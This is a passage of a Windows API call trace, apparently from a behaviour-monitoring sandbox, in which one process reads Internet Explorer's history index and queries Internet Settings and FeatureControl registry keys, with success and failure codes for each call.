Handle => 0x000000dc MutexName => c:!documents and settings!tdw!local settings!history!history.ie5! |
SUCCESS | 0x00000000 | |
| 07:43:40,086 | 1308 | NtOpenFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\History\History.IE5\ DesiredAccess => 0x00100001 FileHandle => 0x000000e0 |
SUCCESS | 0x00000000 | |
| 07:43:40,086 | 1308 | NtOpenFile |
ShareAccess => 3 FileName => C:\ DesiredAccess => 0x00100001 FileHandle => 0x000000e0 |
SUCCESS | 0x00000000 | |
| 07:43:40,086 | 1308 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\TDW\Local Settings\History\History.IE5\ DesiredAccess => 0x00100100 FileHandle => 0x000000e0 |
SUCCESS | 0x00000000 | |
| 07:43:40,086 | 1308 | NtSetInformationFile |
FileHandle => 0x000000e0 FileInformation => |
SUCCESS | 0x00000000 | |
| 07:43:40,086 | 1308 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\History\History.IE5\index.dat DesiredAccess => 0xc0100080 CreateDisposition => 3 FileHandle => 0x000000e0 |
SUCCESS | 0x00000000 | |
| 07:43:40,086 | 1308 | NtSetInformationFile |
FileHandle => 0x000000e0 FileInformation => |
SUCCESS | 0x00000000 | |
| 07:43:40,086 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000e0 FileInformation => \x00\x80\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 07:43:40,086 | 1308 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\History\History.IE5\index.dat DesiredAccess => 0xc0100080 CreateDisposition => 3 FileHandle => 0x000000e0 |
SUCCESS | 0x00000000 | |
| 07:43:40,086 | 1308 | NtOpenSection |
DesiredAccess => 0x00000002 ObjectAttributes => C:\C:_Documents and Settings_TDW_Local Settings_History_History.IE5_index.dat_32768 SectionHandle => 0x000000e4 |
SUCCESS | 0x00000000 | |
| 07:43:40,086 | 1308 | ZwMapViewOfSection |
SectionOffset => 0x00c1f86c SectionHandle => 0x000000e4 ProcessHandle => 0xffffffff BaseAddress => 0x00c30000 |
SUCCESS | 0x00000000 | |
| 07:43:40,086 | 1308 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\ DesiredAccess => 0x00100100 FileHandle => 0x000000e8 |
SUCCESS | 0x00000000 | |
| 07:43:40,086 | 1308 | NtSetInformationFile |
FileHandle => 0x000000e8 FileInformation => |
SUCCESS | 0x00000000 | |
| 07:43:40,086 | 1308 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\TDW\Local Settings\History\History.IE5\ DesiredAccess => 0x00100100 FileHandle => 0x000000e8 |
SUCCESS | 0x00000000 | |
| 07:43:40,086 | 1308 | NtSetInformationFile |
FileHandle => 0x000000e8 FileInformation => |
SUCCESS | 0x00000000 | |
| 07:43:40,086 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 07:43:40,096 | 1308 | RegOpenKeyExA |
Handle => 0x000000e8 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache |
SUCCESS | 0x00000000 | |
| 07:43:40,096 | 1308 | RegOpenKeyExA |
Handle => 0x000000ec Registry => 0x000000e8 SubKey => Extensible Cache |
SUCCESS | 0x00000000 | |
| 07:43:40,096 | 1308 | RegCloseKey |
Handle => 0x000000e8 |
SUCCESS | 0x00000000 | |
| 07:43:40,096 | 1308 | RegEnumKeyExA |
Index => 0 Handle => 0x000000ec Name => MSHist012014062620140627 Class => |
SUCCESS | 0x00000000 | |
| 07:43:40,096 | 1308 | RegOpenKeyExA |
Handle => 0x000000e8 Registry => 0x000000ec SubKey => MSHist012014062620140627 |
SUCCESS | 0x00000000 | |
| 07:43:40,096 | 1308 | RegQueryValueExA |
Handle => 0x000000e8 Data => 0 ValueName => CacheRepair |
SUCCESS | 0x00000000 | |
| 07:43:40,096 | 1308 | RegQueryValueExA |
Handle => 0x000000e8 Data => %USERPROFILE%\Local Settings\History\History.IE5\MSHist012014062620140627\\x00 ValueName => CachePath |
SUCCESS | 0x00000000 | |
| 07:43:40,096 | 1308 | RegQueryValueExA |
Handle => 0x000000e8 Data => :2014062620140627: \x00 ValueName => CachePrefix |
SUCCESS | 0x00000000 | |
| 07:43:40,096 | 1308 | RegQueryValueExA |
Handle => 0x000000e8 Data => 8192 ValueName => CacheLimit |
SUCCESS | 0x00000000 | |
| 07:43:40,096 | 1308 | RegQueryValueExA |
Handle => 0x000000e8 Data => 11 ValueName => CacheOptions |
SUCCESS | 0x00000000 | |
| 07:43:40,096 | 1308 | RegCloseKey |
Handle => 0x000000e8 |
SUCCESS | 0x00000000 | |
| 07:43:40,096 | 1308 | RegEnumKeyExA |
Index => 1 Handle => 0x000000ec Name => MSHist012014062620140627 Class => |
FAILURE | 0x00000103 | |
| 07:43:40,096 | 1308 | RegCloseKey |
Handle => 0x000000ec |
SUCCESS | 0x00000000 | |
| 07:43:40,096 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:43:40,096 | 1308 | RegOpenKeyExA |
Handle => 0x00000000 Registry => 0x80000001 SubKey => SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings |
FAILURE | 0x00000002 | |
| 07:43:40,096 | 1308 | RegOpenKeyExW |
Handle => 0x000000ec Registry => 0x80000002 SubKey => Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings |
SUCCESS | 0x00000000 | |
| 07:43:40,096 | 1308 | RegQueryValueExW |
Handle => 0x000000ec DataLength => 4 ValueName => Security_HKLM_only Type => 12712036 |
FAILURE | 0x00000002 | |
| 07:43:40,096 | 1308 | RegCloseKey |
Handle => 0x000000ec |
SUCCESS | 0x00000000 | |
| 07:43:40,096 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl |
FAILURE | 0x00000002 | |
| 07:43:40,096 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000001 SubKey => Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl |
FAILURE | 0x00000002 | |
| 07:43:40,096 | 1308 | RegOpenKeyExW |
Handle => 0x000000ec Registry => 0x80000002 SubKey => Software\Microsoft\Internet Explorer\Main\FeatureControl |
SUCCESS | 0x00000000 | |
| 07:43:40,096 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000001 SubKey => Software\Microsoft\Internet Explorer\Main\FeatureControl |
FAILURE | 0x00000002 | |
| 07:43:40,096 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000000ec SubKey => FEATURE_AUTOPROXY_CACHE_ANAME_KB921400 |
FAILURE | 0x00000002 | |
| 07:43:40,106 | 1308 | RegCloseKey |
Handle => 0x00000000 |
FAILURE | 0x00000006 | 1 time |
| 07:43:40,106 | 1308 | RegCloseKey |
Handle => 0x000000ec |
SUCCESS | 0x00000000 | |
| 07:43:40,106 | 1308 | RegCloseKey |
Handle => 0x00000000 |
FAILURE | 0x00000006 | |
| 07:43:40,106 | 1308 | RegOpenKeyExA |
Handle => 0x00000000 Registry => 0x80000001 SubKey => SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings |
FAILURE | 0x00000002 | 2 times |
| 07:43:40,106 | 1308 | RegOpenKeyExW |
Handle => 0x000000ec Registry => 0x80000002 SubKey => Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings |
SUCCESS | 0x00000000 | |
| 07:43:40,106 | 1308 | RegQueryValueExW |
Handle => 0x000000ec DataLength => 4 ValueName => Security_HKLM_only Type => 12712036 |
FAILURE | 0x00000002 | |
| 07:43:40,106 | 1308 | RegCloseKey |
Handle => 0x000000ec |
SUCCESS | 0x00000000 | |
| 07:43:40,106 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl |
FAILURE | 0x00000002 | |
| 07:43:40,106 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000001 SubKey => Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl |
FAILURE | 0x00000002 | |
| 07:43:40,106 | 1308 | RegOpenKeyExW |
Handle => 0x000000ec Registry => 0x80000002 SubKey => Software\Microsoft\Internet Explorer\Main\FeatureControl |
SUCCESS | 0x00000000 | |
| 07:43:40,106 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000001 SubKey => Software\Microsoft\Internet Explorer\Main\FeatureControl |
FAILURE | 0x00000002 | |
| 07:43:40,116 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000000ec SubKey => FEATURE_TEMPORARYFILES_FOR_NOCACHE_840387 |
FAILURE | 0x00000002 | |
| 07:43:40,116 | 1308 | RegCloseKey |
Handle => 0x00000000 |
FAILURE | 0x00000006 | 1 time |
| 07:43:40,116 | 1308 | RegCloseKey |
Handle => 0x000000ec |
SUCCESS | 0x00000000 | |
| 07:43:40,116 | 1308 | RegCloseKey |
Handle => 0x00000000 |
FAILURE | 0x00000006 | |
| 07:43:40,116 | 1308 | RegOpenKeyExW |
Handle => 0x000000ec Registry => 0x80000002 SubKey => Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings |
SUCCESS | 0x00000000 | |
| 07:43:40,116 | 1308 | RegQueryValueExW |
Handle => 0x000000ec DataLength => 4 ValueName => Security_HKLM_only Type => 12712036 |
FAILURE | 0x00000002 | |
| 07:43:40,116 | 1308 | RegCloseKey |
Handle => 0x000000ec |
SUCCESS | 0x00000000 | |
| 07:43:40,116 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl |
FAILURE | 0x00000002 | |
| 07:43:40,116 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000001 SubKey => Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl |
FAILURE | 0x00000002 | |
| 07:43:40,116 | 1308 | RegOpenKeyExW |
Handle => 0x000000ec Registry => 0x80000002 SubKey => Software\Microsoft\Internet Explorer\Main\FeatureControl |
SUCCESS | 0x00000000 | |
| 07:43:40,116 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000001 SubKey => Software\Microsoft\Internet Explorer\Main\FeatureControl |
FAILURE | 0x00000002 | |
| 07:43:40,116 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000000ec SubKey => FEATURE_TEMPORARYFILES_FOR_NOCACHE_840386 |
FAILURE | 0x00000002 | |
| 07:43:40,116 | 1308 | RegCloseKey |
Handle => 0x00000000 |
FAILURE | 0x00000006 | 1 time |
| 07:43:40,116 | 1308 | RegCloseKey |
Handle => 0x000000ec |
SUCCESS | 0x00000000 | |
| 07:43:40,116 | 1308 | RegCloseKey |
Handle => 0x00000000 |
FAILURE | 0x00000006 | |
| 07:43:40,116 | 1308 | RegOpenKeyExW |
Handle => 0x000000ec Registry => 0x80000002 SubKey => Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings |
SUCCESS | 0x00000000 | |
| 07:43:40,126 | 1308 | RegQueryValueExW |
Handle => 0x000000ec DataLength => 4 ValueName => Security_HKLM_only Type => 12712032 |
FAILURE | 0x00000002 | |
| 07:43:40,126 | 1308 | RegCloseKey |
Handle => 0x000000ec |
SUCCESS | 0x00000000 | |
| 07:43:40,126 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl |
FAILURE | 0x00000002 | |
| 07:43:40,126 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000001 SubKey => Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl |
FAILURE | 0x00000002 | |
| 07:43:40,126 | 1308 | RegOpenKeyExW |
Handle => 0x000000ec Registry => 0x80000002 SubKey => Software\Microsoft\Internet Explorer\Main\FeatureControl |
SUCCESS | 0x00000000 | |
| 07:43:40,126 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000001 SubKey => Software\Microsoft\Internet Explorer\Main\FeatureControl |
FAILURE | 0x00000002 | |
| 07:43:40,126 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000000ec SubKey => RETRY_HEADERONLYPOST_ONCONNECTIONRESET |
FAILURE | 0x00000002 | |
| 07:43:40,126 | 1308 | RegCloseKey |
Handle => 0x00000000 |
FAILURE | 0x00000006 | 1 time |
| 07:43:40,126 | 1308 | RegCloseKey |
Handle => 0x000000ec |
SUCCESS | 0x00000000 | |
| 07:43:40,126 | 1308 | RegCloseKey |
Handle => 0x00000000 |
FAILURE | 0x00000006 | |
| 07:43:40,126 | 1308 | RegOpenKeyExW |
Handle => 0x000000ec Registry => 0x80000002 SubKey => Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings |
SUCCESS | 0x00000000 | |
| 07:43:40,126 | 1308 | RegQueryValueExW |
Handle => 0x000000ec DataLength => 4 ValueName => Security_HKLM_only Type => 12712036 |
FAILURE | 0x00000002 | |
| 07:43:40,126 | 1308 | RegCloseKey |
Handle => 0x000000ec |
SUCCESS | 0x00000000 | |
| 07:43:40,126 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl |
FAILURE | 0x00000002 | |
| 07:43:40,126 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000001 SubKey => Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl |
FAILURE | 0x00000002 | |
| 07:43:40,126 | 1308 | RegOpenKeyExW |
Handle => 0x000000ec Registry => 0x80000002 SubKey => Software\Microsoft\Internet Explorer\Main\FeatureControl |
SUCCESS | 0x00000000 | |
| 07:43:40,136 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000001 SubKey => Software\Microsoft\Internet Explorer\Main\FeatureControl |
FAILURE | 0x00000002 | |
| 07:43:40,136 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000000ec SubKey => FEATURE_CHUNK_TIMEOUT_KB914453 |
FAILURE | 0x00000002 | |
| 07:43:40,136 | 1308 | RegCloseKey |
Handle => 0x00000000 |
FAILURE | 0x00000006 | 1 time |
| 07:43:40,136 | 1308 | RegCloseKey |
Handle => 0x000000ec |
SUCCESS | 0x00000000 | |
| 07:43:40,136 | 1308 | RegCloseKey |
Handle => 0x00000000 |
FAILURE | 0x00000006 | |
| 07:43:40,136 | 1308 | RegOpenKeyExW |
Handle => 0x000000ec Registry => 0x80000002 SubKey => Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings |
SUCCESS | 0x00000000 | |
| 07:43:40,136 | 1308 | RegQueryValueExW |
Handle => 0x000000ec DataLength => 4 ValueName => Security_HKLM_only Type => 12712036 |
FAILURE | 0x00000002 | |
| 07:43:40,136 | 1308 | RegCloseKey |
Handle => 0x000000ec |
SUCCESS | 0x00000000 | |
| 07:43:40,136 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl |
FAILURE | 0x00000002 | |
| 07:43:40,136 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000001 SubKey => Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl |
FAILURE | 0x00000002 | |
| 07:43:40,136 | 1308 | RegOpenKeyExW |
Handle => 0x000000ec Registry => 0x80000002 SubKey => Software\Microsoft\Internet Explorer\Main\FeatureControl |
SUCCESS | 0x00000000 | |
| 07:43:40,136 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000001 SubKey => Software\Microsoft\Internet Explorer\Main\FeatureControl |
FAILURE | 0x00000002 | |
| 07:43:40,136 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000000ec SubKey => FEATURE_CERT_TRUST_VERIFIED_KB936882 |
FAILURE | 0x00000002 | |
| 07:43:40,146 | 1308 | RegCloseKey |
Handle => 0x00000000 |
FAILURE | 0x00000006 | 1 time |
| 07:43:40,146 | 1308 | RegCloseKey |
Handle => 0x000000ec |
SUCCESS | 0x00000000 | |
| 07:43:40,146 | 1308 | RegCloseKey |
Handle => 0x00000000 |
FAILURE | 0x00000006 | |
| 07:43:40,146 | 1308 | RegOpenKeyExA |
Handle => 0x00000000 Registry => 0x80000001 SubKey => SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings |
FAILURE | 0x00000002 | |
| 07:43:40,146 | 1308 | RegOpenKeyExA |
Handle => 0x000000ec Registry => 0x80000002 SubKey => SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings |
SUCCESS | 0x00000000 | |
| 07:43:40,146 | 1308 | RegQueryValueExA |
Handle => 0x000000ec DataLength => 4 ValueName => DisableWorkerThreadHibernation Type => 236 |
FAILURE | 0x00000002 | |
| 07:43:40,146 | 1308 | RegCloseKey |
Handle => 0x000000ec |
SUCCESS | 0x00000000 | |
| 07:43:40,146 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => DisableWorkerThreadHibernation Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:40,146 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => DisableReadRange Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:40,146 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => SocketSendBufferLength Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:40,146 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => SocketReceiveBufferLength Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:40,146 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => KeepAliveTimeout Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:40,146 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => MaxHttpRedirects Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:40,146 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => MaxConnectionsPerServer Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:40,146 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => MaxConnectionsPer1_0Server Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:40,146 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => ServerInfoTimeout Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:40,146 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => ReceiveTimeOut Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:40,146 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => DisableNTLMPreAuth Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:40,146 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => ScavengeCacheLowerBound Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:40,156 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => CertCacheNoValidate Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:40,156 | 1308 | RegOpenKeyExA |
Handle => 0x000000ec Registry => 0x80000001 SubKey => SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache |
SUCCESS | 0x00000000 | |
| 07:43:40,156 | 1308 | RegQueryValueExA |
Handle => 0x000000ec DataLength => 4 ValueName => ScavengeCacheFileLifeTime Type => 236 |
FAILURE | 0x00000002 | |
| 07:43:40,156 | 1308 | RegCloseKey |
Handle => 0x000000ec |
SUCCESS | 0x00000000 | |
| 07:43:40,156 | 1308 | RegOpenKeyExA |
Handle => 0x000000ec Registry => 0x80000002 SubKey => SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings |
SUCCESS | 0x00000000 | |
| 07:43:40,156 | 1308 | RegQueryValueExA |
Handle => 0x000000ec DataLength => 4 ValueName => Security_HKLM_only Type => 236 |
FAILURE | 0x00000002 | |
| 07:43:40,156 | 1308 | RegCloseKey |
Handle => 0x000000ec |
SUCCESS | 0x00000000 | |
| 07:43:40,156 | 1308 | RegOpenKeyExA |
Handle => 0x00000000 Registry => 0x80000002 SubKey => SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache |
FAILURE | 0x00000002 | |
| 07:43:40,156 | 1308 | RegOpenKeyExA |
Handle => 0x00000000 Registry => 0x80000001 SubKey => SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache |
FAILURE | 0x00000002 | |
| 07:43:40,156 | 1308 | RegOpenKeyExA |
Handle => 0x000000ec Registry => 0x80000002 SubKey => SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache |
SUCCESS | 0x00000000 | |
| 07:43:40,156 | 1308 | RegOpenKeyExA |
Handle => 0x000000e8 Registry => 0x80000001 SubKey => SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache |
SUCCESS | 0x00000000 | |
| 07:43:40,156 | 1308 | RegQueryValueExA |
Handle => 0x000000e8 DataLength => 4 ValueName => ScavengeCacheFileLimit Type => 232 |
FAILURE | 0x00000002 | |
| 07:43:40,156 | 1308 | RegQueryValueExA |
Handle => 0x000000ec DataLength => 4 ValueName => ScavengeCacheFileLimit Type => 236 |
FAILURE | 0x00000002 | |
| 07:43:40,156 | 1308 | RegCloseKey |
Handle => 0x00000000 |
FAILURE | 0x00000006 | 1 time |
| 07:43:40,156 | 1308 | RegCloseKey |
Handle => 0x000000ec |
SUCCESS | 0x00000000 | |
| 07:43:40,156 | 1308 | RegCloseKey |
Handle => 0x000000e8 |
SUCCESS | 0x00000000 | |
| 07:43:40,156 | 1308 | RegOpenKeyExW |
Handle => 0x000000e8 Registry => 0x80000002 SubKey => Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings |
SUCCESS | 0x00000000 | |
| 07:43:40,156 | 1308 | RegQueryValueExW |
Handle => 0x000000e8 DataLength => 4 ValueName => Security_HKLM_only Type => 12712036 |
FAILURE | 0x00000002 | |
| 07:43:40,156 | 1308 | RegCloseKey |
Handle => 0x000000e8 |
SUCCESS | 0x00000000 | |
| 07:43:40,166 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl |
FAILURE | 0x00000002 | |
| 07:43:40,166 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000001 SubKey => Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl |
FAILURE | 0x00000002 | |
| 07:43:40,166 | 1308 | RegOpenKeyExW |
Handle => 0x000000e8 Registry => 0x80000002 SubKey => Software\Microsoft\Internet Explorer\Main\FeatureControl |
SUCCESS | 0x00000000 | |
| 07:43:40,166 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000001 SubKey => Software\Microsoft\Internet Explorer\Main\FeatureControl |
FAILURE | 0x00000002 | |
| 07:43:40,166 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000000e8 SubKey => FEATURE_BUFFERBREAKING_818408 |
FAILURE | 0x00000002 | |
| 07:43:40,166 | 1308 | RegCloseKey |
Handle => 0x00000000 |
FAILURE | 0x00000006 | 1 time |
| 07:43:40,166 | 1308 | RegCloseKey |
Handle => 0x000000e8 |
SUCCESS | 0x00000000 | |
| 07:43:40,166 | 1308 | RegCloseKey |
Handle => 0x00000000 |
FAILURE | 0x00000006 | |
| 07:43:40,166 | 1308 | RegOpenKeyExW |
Handle => 0x000000e8 Registry => 0x80000002 SubKey => Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings |
SUCCESS | 0x00000000 | |
| 07:43:40,166 | 1308 | RegQueryValueExW |
Handle => 0x000000e8 DataLength => 4 ValueName => Security_HKLM_only Type => 12712036 |
FAILURE | 0x00000002 | |
| 07:43:40,166 | 1308 | RegCloseKey |
Handle => 0x000000e8 |
SUCCESS | 0x00000000 | |
| 07:43:40,166 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl |
FAILURE | 0x00000002 | |
| 07:43:40,166 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000001 SubKey => Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl |
FAILURE | 0x00000002 | |
| 07:43:40,166 | 1308 | RegOpenKeyExW |
Handle => 0x000000e8 Registry => 0x80000002 SubKey => Software\Microsoft\Internet Explorer\Main\FeatureControl |
SUCCESS | 0x00000000 | |
| 07:43:40,166 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000001 SubKey => Software\Microsoft\Internet Explorer\Main\FeatureControl |
FAILURE | 0x00000002 | |
| 07:43:40,166 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000000e8 SubKey => FEATURE_SKIP_POST_RETRY_ON_INTERNETWRITEFILE_KB895954 |
FAILURE | 0x00000002 | |
| 07:43:40,176 | 1308 | RegCloseKey |
Handle => 0x00000000 |
FAILURE | 0x00000006 | 1 time |
| 07:43:40,176 | 1308 | RegCloseKey |
Handle => 0x000000e8 |
SUCCESS | 0x00000000 | |
| 07:43:40,176 | 1308 | RegCloseKey |
Handle => 0x00000000 |
FAILURE | 0x00000006 | |
| 07:43:40,176 | 1308 | RegOpenKeyExW |
Handle => 0x000000e8 Registry => 0x80000002 SubKey => Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings |
SUCCESS | 0x00000000 | |
| 07:43:40,176 | 1308 | RegQueryValueExW |
Handle => 0x000000e8 DataLength => 4 ValueName => Security_HKLM_only Type => 12712036 |
FAILURE | 0x00000002 | |
| 07:43:40,176 | 1308 | RegCloseKey |
Handle => 0x000000e8 |
SUCCESS | 0x00000000 | |
| 07:43:40,176 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl |
FAILURE | 0x00000002 | |
| 07:43:40,176 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000001 SubKey => Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl |
FAILURE | 0x00000002 | |
| 07:43:40,176 | 1308 | RegOpenKeyExW |
Handle => 0x000000e8 Registry => 0x80000002 SubKey => Software\Microsoft\Internet Explorer\Main\FeatureControl |
SUCCESS | 0x00000000 | |
| 07:43:40,176 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000001 SubKey => Software\Microsoft\Internet Explorer\Main\FeatureControl |
FAILURE | 0x00000002 | |
| 07:43:40,176 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000000e8 SubKey => FEATURE_ENSURE_FQDN_FOR_NEGOTIATE_KB899417 |
FAILURE | 0x00000002 | |
| 07:43:40,176 | 1308 | RegCloseKey |
Handle => 0x00000000 |
FAILURE | 0x00000006 | 1 time |
| 07:43:40,176 | 1308 | RegCloseKey |
Handle => 0x000000e8 |
SUCCESS | 0x00000000 | |
| 07:43:40,176 | 1308 | RegCloseKey |
Handle => 0x00000000 |
FAILURE | 0x00000006 | |
| 07:43:40,176 | 1308 | RegOpenKeyExW |
Handle => 0x000000e8 Registry => 0x80000002 SubKey => Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings |
SUCCESS | 0x00000000 | |
| 07:43:40,176 | 1308 | RegQueryValueExW |
Handle => 0x000000e8 DataLength => 4 ValueName => Security_HKLM_only Type => 12712036 |
FAILURE | 0x00000002 | |
| 07:43:40,176 | 1308 | RegCloseKey |
Handle => 0x000000e8 |
SUCCESS | 0x00000000 | |
| 07:43:40,176 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl |
FAILURE | 0x00000002 | |
| 07:43:40,186 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000001 SubKey => Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl |
FAILURE | 0x00000002 | |
| 07:43:40,186 | 1308 | RegOpenKeyExW |
Handle => 0x000000e8 Registry => 0x80000002 SubKey => Software\Microsoft\Internet Explorer\Main\FeatureControl |
SUCCESS | 0x00000000 | |
| 07:43:40,186 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000001 SubKey => Software\Microsoft\Internet Explorer\Main\FeatureControl |
FAILURE | 0x00000002 | |
| 07:43:40,186 | 1308 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000000e8 SubKey => FEATURE_HTTP_DISABLE_NTLM_PREAUTH_IF_ABORTED_KB902409 |
FAILURE | 0x00000002 | |
| 07:43:40,186 | 1308 | RegCloseKey |
Handle => 0x00000000 |
